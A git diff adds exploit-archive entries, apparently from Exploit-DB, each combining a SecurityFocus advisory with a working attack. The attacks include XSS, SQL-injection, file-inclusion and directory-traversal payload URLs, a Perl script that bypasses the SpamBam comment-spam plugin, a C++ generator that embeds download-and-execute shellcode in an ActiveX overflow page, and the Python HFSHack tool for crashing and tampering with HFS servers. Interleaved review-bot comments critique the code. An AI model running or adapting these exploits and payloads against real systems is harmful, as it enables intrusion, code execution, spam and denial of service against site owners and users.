+ "0205", 4,
+ "0847", 5,
+ "0601", 6,
+ "0644", 7,
+ "0405", 8,
+ "0031", 9);
+
+ my %numberSizes = ( 0, 4045,
+ 1, 3983,
+ 2, 4431,
+ 3, 4250,
+ 4, 4595,
+ 5, 5389,
+ 6, 4949,
+ 7, 4436,
+ 8, 4584,
+ 9, 5009);
+
+ my $PLUS_SIZE = 7365;
+
+ open (INFILE, "<$ARGV[0]");
+ binmode(INFILE);
+ sysseek(INFILE, 14, 0); #That "0" third argument makes seeking
+absoulte
+ sysread(INFILE, $buffer, 2);
+ #$number = sprintf("%x%x", map {ord($_)}
+split(//,substr($buffer,0,2)));
+ $number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
+ $op1 = $numberPrints{$number};
+ sysseek(INFILE, $numberSizes{$op1} + $PLUS_SIZE - 2, 1); #That
+third "1" argument makes seeking relative
+ sysread(INFILE, $buffer, 2);
+ $number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
+ $op2 = $numberPrints{$number};
+ print $op1 . " + " . $op2 . " = " . ($op1+$op2) . "\n";
+ close(INFILE);
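Review bot: `open (INFILE, "<$ARGV[0]");` is a two-argument open on a command-line value and its result is never checked, so a missing or unreadable file falls through to `sysseek`/`sysread` on an unopened handle and the script prints a sum of undefined values instead of an error. The three-argument form with an explicit failure path is the safer idiom: `open(my $in, '<', $ARGV[0]) or die "cannot open $ARGV[0]: $!";`. The `%numberPrints` lookups are likewise used without checking that the key exists, so unexpected input yields a silent wrong answer rather than a diagnostic. The advisory prose and the `$ cat math_spam.pl` line sit uncommented ahead of the shebang, which the file header should mark as non-code.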
diff --git a/platforms/php/webapps/31030.pl b/platforms/php/webapps/31030.pl
new file mode 100755
index 000000000..4e532043c
--- /dev/null
+++ b/platforms/php/webapps/31030.pl
@@ -0,0 +1,102 @@
+source: http://www.securityfocus.com/bid/27291/info
+
+SpamBam is prone to a security-bypass vulnerability because client-accessible data can be used to calculate verification keys.
+
+Attackers can exploit this issue to submit arbitrary form data via automated scripts and distribute spam.
+
+#!/usr/bin/perl -w
+
+# Defeating SpamBam exploit
+# by Jose Palazon (josem.palazon@gmail.com) (a.k.a. palako)
+
+# Vulnerable software:
+# SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes
+
+# Vulnerability:
+# No matter how hard you ofuscate or encrypt your code, never, under no
+circunstances, rely
+# any security aspect on the client. Never!
+
+# How the plugin works:
+# It generates a pseudo-random code both on the client and the server to
+generate a key.
+# On form submit, both key values are checked and they should match to
+allow comment insertion.
+
+#How the exploit works:
+# It does nothing but acting as a client. It parses the html, extracts
+the javascript, process it
+# to calculate the key and fills the hidden field with it.
+
+# Solution:
+# Sorry guys but there's no fix for this. It'ss just a design flaw.
+
+use WWW::Mechanize;
+use JavaScript::SpiderMonkey;
+
+my $tmpContent;
+my $javascriptCode;
+my $spamBamKey;
+
+die ("Usage: spambam.pl \n") unless
+$ARGV[3];
+
+my $url = $ARGV[0];
+my $author = $ARGV[1];
+my $email = $ARGV[2];
+my $comment = $ARGV[3];
+
+my $mech = WWW::Mechanize->new( autocheck => 1 );
+
+$mech->get($url);
+
+# WWW::Mechanize doesn't support javascript, so the field
+comment_spambamKey won't be
+# recognized by $mech->field. Thus, I'll make an update_html adding the
+field, and for
+# this purpose I save first the original contents. Indeed, substitition
+occurs via the
+# javascript callback function "extractKey"
+$tmpContent = $mech->content;
+
+
+# Eliminate carriage returns to apply sed. Later I'll have to restore
+them
+# to execute the javascript code, as not every line is semicolon
+terminated.
+# That's the reason of the __WHO_BAMS_WHO__ string.
+$_ = $mech->content;
+s/\n/__WHO_BAMS_WHO__/g;
+
+# Extract the javascript code and the name of the variable where the key
+is going to be calculated
+/
diff --git a/platforms/php/webapps/31037.txt b/platforms/php/webapps/31037.txt
new file mode 100755
index 000000000..ad4b93a0c
--- /dev/null
+++ b/platforms/php/webapps/31037.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27346/info
+
+phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
+
+phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[SH3LL]
\ No newline at end of file
diff --git a/platforms/php/webapps/31038.txt b/platforms/php/webapps/31038.txt
new file mode 100755
index 000000000..37026278d
--- /dev/null
+++ b/platforms/php/webapps/31038.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27346/info
+
+phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
+
+phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/31041.txt b/platforms/php/webapps/31041.txt
new file mode 100755
index 000000000..5109c543f
--- /dev/null
+++ b/platforms/php/webapps/31041.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/27361/info
+
+bloofoxCMS is prone to a directory-traversal vulnerability, a SQL-injection vulnerability, and an authentication-bypass vulnerability.
+
+The SQL-injection vulnerability occurs because the application fails to sufficiently sanitize user-supplied data to the 'username' parameter of the 'class_permissions.php' script before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The authentication-bypass vulnerability stems from a lack of input-validation mechanisms in the 'system/class_permissions.php' file. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+The directory-traversal vulnerability occurs because the application fails to properly sanitize user-supplied input data to the 'file' parameter of 'file.php'. The attacker's input would consist of '../' directory-traversal sequences. Successful exploits could allow the attacker to access the contents of potentially sensitive files on the affected computer. Information obtained may help the attacker launch other attacks against the system.
+
+bloofoxCMS 0.3 is vulnerable to these issues; previous versions may be affected as well.
+
+Username: admin' or 1=1 /*
+Password: something
+
+An example for the directory-traversal vulnerability was provided:
+
+GET: http://www.example.com/bloofoxCMS_0.3/file.php?file=../../system/class_mysql.php
+
+
diff --git a/platforms/php/webapps/31044.txt b/platforms/php/webapps/31044.txt
new file mode 100755
index 000000000..680df21ed
--- /dev/null
+++ b/platforms/php/webapps/31044.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27382/info
+
+singapore Modern template is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Modern 1.3.2 and prior versions are reported vulnerable. Reports indicate that Modern 1.3.2 ships with singapore 0.10.1 by default.
+
+http://www.example.com/[singapore_path]/default.php?gallery=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31045.txt b/platforms/php/webapps/31045.txt
new file mode 100755
index 000000000..c42fb471a
--- /dev/null
+++ b/platforms/php/webapps/31045.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27383/info
+
+Small Axe Weblog is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+This issue affects Small Axe Weblog 0.3.1; other versions may also be vulnerable.
+
+http://www.example.com/inc/linkbar.php?ffile=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/31048.txt b/platforms/php/webapps/31048.txt
new file mode 100755
index 000000000..abc3ef0d6
--- /dev/null
+++ b/platforms/php/webapps/31048.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27397/info
+
+PacerCMS is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+These issues affect versions prior to PacerCMS 0.6.1.
+
+NOTE: To exploit these issues, the attacker may require 'staff member' access.
+
+http://www.example.com/pacercms/siteadmin/article-edit.php?id=[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/31049.txt b/platforms/php/webapps/31049.txt
new file mode 100755
index 000000000..3e270ac2c
--- /dev/null
+++ b/platforms/php/webapps/31049.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27401/info
+
+DeluxeBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects DeluxeBB 1.1; other versions may also be vulnerable.
+
+http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=
\ No newline at end of file
diff --git a/platforms/php/webapps/31060.txt b/platforms/php/webapps/31060.txt
new file mode 100755
index 000000000..49bf805d9
--- /dev/null
+++ b/platforms/php/webapps/31060.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27459/info
+
+Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/index.php?option="'>&Itemid=12
\ No newline at end of file
diff --git a/platforms/php/webapps/31061.txt b/platforms/php/webapps/31061.txt
new file mode 100755
index 000000000..21e2e9372
--- /dev/null
+++ b/platforms/php/webapps/31061.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27460/info
+
+The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
+
+http://www.example.com/user/index.php?">
\ No newline at end of file
diff --git a/platforms/php/webapps/31062.txt b/platforms/php/webapps/31062.txt
new file mode 100755
index 000000000..63cd797f2
--- /dev/null
+++ b/platforms/php/webapps/31062.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27460/info
+
+The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
+
+http://www.example.com/maint/index.php?">
\ No newline at end of file
diff --git a/platforms/php/webapps/31063.txt b/platforms/php/webapps/31063.txt
new file mode 100755
index 000000000..adb3687c0
--- /dev/null
+++ b/platforms/php/webapps/31063.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27461/info
+
+WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
+
+These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
+
+http://www.example.com/pref.php?>'">
\ No newline at end of file
diff --git a/platforms/php/webapps/31064.txt b/platforms/php/webapps/31064.txt
new file mode 100755
index 000000000..abc6390d3
--- /dev/null
+++ b/platforms/php/webapps/31064.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27461/info
+
+WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
+
+These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
+
+http://www.example.com/search.php?adv=>"'>
\ No newline at end of file
diff --git a/platforms/php/webapps/31065.txt b/platforms/php/webapps/31065.txt
new file mode 100755
index 000000000..e42902e78
--- /dev/null
+++ b/platforms/php/webapps/31065.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27462/info
+
+F5 BIG-IP Application Security Manager is prone to a cross-site scripting vulnerability because the web management interface fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects F5 BIG-IP Application Security Manager 9.4.3; other versions may also be vulnerable.
+
+https://(target)/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
\ No newline at end of file
diff --git a/platforms/php/webapps/31066.txt b/platforms/php/webapps/31066.txt
new file mode 100755
index 000000000..646122ba8
--- /dev/null
+++ b/platforms/php/webapps/31066.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27470/info
+
+The MOStlyCE module for Mambo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
+
+http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=
\ No newline at end of file
diff --git a/platforms/php/webapps/31067.txt b/platforms/php/webapps/31067.txt
new file mode 100755
index 000000000..786d917b8
--- /dev/null
+++ b/platforms/php/webapps/31067.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27471/info
+
+ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
+
+ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/31068.txt b/platforms/php/webapps/31068.txt
new file mode 100755
index 000000000..1227facd9
--- /dev/null
+++ b/platforms/php/webapps/31068.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27472/info
+
+The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
+
+MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
+
+http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=
\ No newline at end of file
diff --git a/platforms/php/webapps/31069.txt b/platforms/php/webapps/31069.txt
new file mode 100755
index 000000000..e4c5edd40
--- /dev/null
+++ b/platforms/php/webapps/31069.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27473/info
+
+eTicket is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+eTicket 1.5.6-RC4 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/index.php/">
\ No newline at end of file
diff --git a/platforms/windows/local/31036.txt b/platforms/windows/local/31036.txt
new file mode 100755
index 000000000..9fd0db8f1
--- /dev/null
+++ b/platforms/windows/local/31036.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/27341/info
+
+CORE FORCE Firewall and Registry modules are prone to multiple local kernel buffer-overflow vulnerabilities because the software fails to adequately verify user-supplied input.
+
+Local attackers can exploit these issues to cause denial-of-service conditions. Attackers may also be able to escalate privileges and execute arbitrary code, but this has not been confirmed.
+
+These issues affect versions up to and including CORE FORCE 0.95.167.
+
+All the vulnerabilities can be reproduced by running a combination of
+DC2 and BSODHook tools.
+
+Step by step instructions:
+
+- Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
+
+- Login as unprivileged user.
+
+- Run "dc2 /hct /a".
+
+- Get BSODHook.exe from Matousec
+http://www.matousec.com/projects/windows-personal-firewall-analysis/plague-in-security-software-drivers.php
+
+- Click on "Load Driver" then click on "Find SSDT hooks" then "Add to
+probe list" and then "GO".
diff --git a/platforms/windows/remote/31039.txt b/platforms/windows/remote/31039.txt
new file mode 100755
index 000000000..0d923d0a0
--- /dev/null
+++ b/platforms/windows/remote/31039.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27358/info
+
+BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
+
+BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected.
+
+echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc
\ No newline at end of file
diff --git a/platforms/windows/remote/31040.html b/platforms/windows/remote/31040.html
new file mode 100755
index 000000000..b5361468f
--- /dev/null
+++ b/platforms/windows/remote/31040.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27360/info
+
+Surveillix DVR 'MeIpCamX.DLL' ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+These issues affect 'MeIpCamX.DLL' 1.0.0.4; other versions may also be vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/31046.cpp b/platforms/windows/remote/31046.cpp
new file mode 100755
index 000000000..c55bde1a1
--- /dev/null
+++ b/platforms/windows/remote/31046.cpp
@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/27393/info
+
+GlobalLink 'GLChat.ocx' ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+GlobalLink 'GLChat.ocx' ActiveX control 2.5.1.33 is reported affected by this issue; other versions may also be vulnerable.
+
+//date:2007.10 fuzz by Knell@Knell-0xSec QQ:415964
+#define _CRT_SECURE_NO_DEPRECATE
+
+#include
+#include
+
+const unsigned char shellcode[174] =
+{
+0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
+0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
+0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
+0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
+0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
+0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
+0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
+0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
+0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
+0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
+0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
+};
+
+const char* script1 = \
+""
+""
+"";
+
+int main(int argc, char* argv[])
+{
+if ( argc != 2 )
+{
+printf("usage:knell.exe down&exec-url\njÖʽçlobalLink)GLChat.ocx ActiveX Control BoF exploit\n bug fuzz by knell 2007.10\n");
+return -1;
+}
+
+FILE *file = fopen("knell.html", "w+");
+if ( file == NULL )
+{
+printf("create 'knell.html' failed!\n");
+return -2;
+}
+
+fprintf(file, "%s", script1);
+for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
+fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
+
+const unsigned l = strlen(argv[1]);
+for ( unsigned j = 0; j < l; j += 2 )
+fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
+
+fprintf(file, "%s", script2);
+fclose(file);
+
+printf("make 'knell.html' successed!\n");
+
+return 0;
+}
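Review bot: The 174-byte `shellcode` array is committed as opaque bytes with no comment describing it, so anyone triaging this archive entry has to disassemble it before they can judge what the generated `knell.html` would do. I would add a comment above the array such as `// opaque payload bytes as published; per the usage string ("down&exec-url") the URL argument is appended after them - handle knell.html as live malicious content, isolated analysis hosts only`. The entry also looks incomplete as archived: both `#include` lines have no header name, `script1` is three empty strings, and `script2` is used near the end of `main` but never declared in this hunk, presumably because markup was stripped. A one-line note in the prose header saying the listing is a sanitised, non-buildable copy would keep readers from mistaking it for the original source.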
diff --git a/platforms/windows/remote/31056.py b/platforms/windows/remote/31056.py
new file mode 100755
index 000000000..76d40e884
--- /dev/null
+++ b/platforms/windows/remote/31056.py
@@ -0,0 +1,334 @@
+source: http://www.securityfocus.com/bid/27423/info
+
+HFS (HTTP File Server) is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a denial-of-service issue, a username-spoofing issue, and a logfile-forging issue.
+
+A successful exploit could allow an attacker to deny service to legitimate users, create and execute arbitrary files in the context of the webserver process, falsify log information, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
+
+#!/usr/bin/python
+
+"""
+----------------------------------------------------------------
+HFSHack 1.0b (By Felipe M. Aragon And Alec Storm )
+----------------------------------------------------------------
+* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
+* CVE-2008-0410 - Information Disclosure Vulnerability
+Affected Versions: HFS 2.0 to and including 2.3(Beta Build 174)
+http://www.syhunt.com/advisories/hfs-1-template.txt
+
+* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
+* CVE-2008-0406 - Denial of Service (DoS) Vulnerability
+Affected Versions: HFS 2.2 to and including 2.3(Beta Build 174)
+http://www.syhunt.com/advisories/hfs-1-log.txt
+
+* CVE-2008-0407 - Username Spoofing Vulnerability
+* CVE-2008-0408 - Log Forging / Injection Vulnerability
+Affected Versions: HFS 1.5g to and including 2.3(Beta Build
+174); and possibly HFS version 1.5f
+http://www.syhunt.com/advisories/hfs-1-username.txt
+
+Vulnerabilities found by Syhunt (http://www.syhunt.com)
+Sandcat can also identify these issues:
+http://www.syhunt.com/sandcat
+"""
+
+import urllib2, sys, re, commands, StringIO, string, base64
+
+host = '127.0.0.1' # Default Host
+
+help = ('\n'
+'open [hostname]\n'
+' This should be called first (unless you want the default host)\n\n'
+'checkdos\n'
+' Performs the Log DoS Attack (Makes the server crash)\n\n'
+'checkxss\n'
+' Checks for the presence of the Template XSS Vulnerability\n\n'
+'manipf [localfilename] [remotefilename]\n'
+' Appends content of a local file to a remote file. Examples:\n'
+' manipf inject.html index.html or ..\\..\index.html\n'
+' Note: If the file does not exists, it will be created.\n\n'
+'maniplog [localfilename]\n'
+' Injects content of a local file to the HFS log panel and file\n\n'
+'mkd [dirname]\n'
+' Creates directories. Examples:\n'
+' mkd Test or ..\\..\\Windows\\Test\n\n'
+'symbols\n'
+' Forces HFS to reveal details about the server\n\n'
+'ver\n'
+' Forces HFS to show its version and build, and displays which\n\n'
+' HFSHack commands are available for it\n'
+'quit\n'
+' Exits this application'
+'\r\n')
+
+readme = (
+'(c) 2008 Syhunt Security. All rights reserved.\n\n'
+'This tool is provided ''as-is'', without any expressed or implied\n'
+'warranty. In no event will the author be held liable for any\n'
+'damages arising from the use of this tool.\n\n'
+'Permission is granted to anyone to use this tool, and to alter\n'
+'it and redistribute it freely, subject to the following\n'
+'restrictions:\n\n'
+'1. The origin of this tool must not be misrepresented, you must\n'
+' not claim that you wrote the original tool.\n\n'
+'2. Altered source versions must be plainly marked as such, and\n'
+' must not be misrepresented as being the original plugin.\n\n'
+'3. This notice may not be removed or altered from any source\n'
+' distribution.\n\n'
+'If you have any questions concerning this license, please email\n'
+'contact _at_ syhunt _dot_ com\n'
+)
+
+about = (
+'----------------------------------------------------------------\n'
+' Syhunt HFSHack 1.0b\n'
+'----------------------------------------------------------------\n\n'
+'This exploit tool should be used only by system administrators\n'
+'(or other people in charge).\n\n'
+'Type "readme" and read the text before continuing\n\n'
+'If you have already read it, type "help" to view a list of\n'
+'commands.'
+)
+
+# Extra Details to Obtain
+symbol_list = (
+'connections;Current number of connections to HFS',
+'timestamp;Date and time of the server',
+'uptime;Uptime',
+'speed-out;Current outbound speed',
+'speed-in;Current inbound speed',
+'total-out;Total amount of bytes sent',
+'total-downloads;Total amount of bytes sent',
+'total-hits;Total Hits',
+'total-uploads;Total Uploads',
+'number-addresses;Current number of connected clients (IPs)',
+'number-addresses-ever;Number of unique IPs ever connected',
+'number-addresses-downloading;Current number of downloading clients (IPs)',
+)
+
+# Affected Versions
+re_200801161 = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
+re_200801162 = '^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)'
+re_200801163 = '^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
+re_cangetver = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])'
+
+# Common Messages
+msg_par_mis = 'Parameter(s) missing.'
+msg_done = 'Done.\n'
+msg_acc_file = 'Error reading local file (file not found):'
+msg_help = 'Type "help" to view a list of commands.'
+msg_err_con = 'Error Connecting:'
+msg_fail = 'Failed.'
+msg_req_ok = 'Request accepted.'
+
+uagent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Syhunt HFSHack)';
+path = '/' # Default Path
+
+def dorequest(hpath,auth_data,s_msg,f_msg):
+ globals()["rcvd"] = ''
+ globals()["banner"] = ''
+ url = 'http://'+host+hpath
+ try:
+ opener = urllib2.build_opener(url)
+ opener.addheaders = [('User-agent', uagent)]
+ if auth_data != '':
+ opener.addheaders = [('Authorization', 'Basic '+auth_data)]
+ globals()["rcvd"] = opener.open(url).readlines()
+ if 'server' in opener.open(url).headers:
+ globals()["banner"] = opener.open(url).headers['server']
+ except Exception, msg:
+ if f_msg != '':
+ print f_msg,msg
+ return False
+ else:
+ if s_msg != '':
+ print s_msg
+ return True
+
+def genbase64str(string):
+ base64str = base64.encodestring(string);
+ base64str = base64str.replace("\n","")
+ return base64str
+
+def readlocalfile(filename):
+ file = open(filename, "r")
+ text = file.readlines()
+ file.close()
+ print text
+ filecontentstr = ''
+ for l in text:
+ filecontentstr = filecontentstr+l
+ return filecontentstr
+
+def ishostavailable():
+ return dorequest(path,'','',msg_err_con)
+
+def getservinfo(symbol,desc):
+ base64str = base64.encodestring('%'+symbol+'%');
+ if dorequest(path,base64str,'',msg_err_con):
+ for l in rcvd:
+ hfsver = re.findall('(.*?)', l)
+ for r in hfsver:
+ if r != []:
+ hfsverdec = urllib2.unquote(hfsver[0])
+ if desc != '':
+ print desc+': '+hfsverdec
+ return hfsverdec
+ else:
+ return ''
+
+def getallservinf():
+ for l in symbol_list:
+ curl = l.split(';')
+ getservinfo(curl[0],curl[1])
+
+def hfsmkdir(dirname):
+ base64str = genbase64str('\\..\\'+dirname+'\\')+'AA';
+ dorequest(path,base64str,msg_req_ok,msg_fail)
+
+def shutdownhfs():
+ dosstr = genbase64str('a' * 270 + ':')
+ if dorequest(path,dosstr,msg_fail,'DoS executed.'):
+ dorequest(path,'','Host is still up.','Host is now down.')
+
+def hfsappendtofile(filename,string):
+ base64str = genbase64str('\\..\\'+filename)+'AA';
+ dorequest('/?%0a'+string,base64str,msg_req_ok,msg_fail)
+
+def hfsinjecttolog(string):
+ base64str = genbase64str(string);
+ dorequest('/',base64str,msg_req_ok,msg_fail)
+
+def procparams(cmd):
+ try:
+ if len(cmd) > 0:
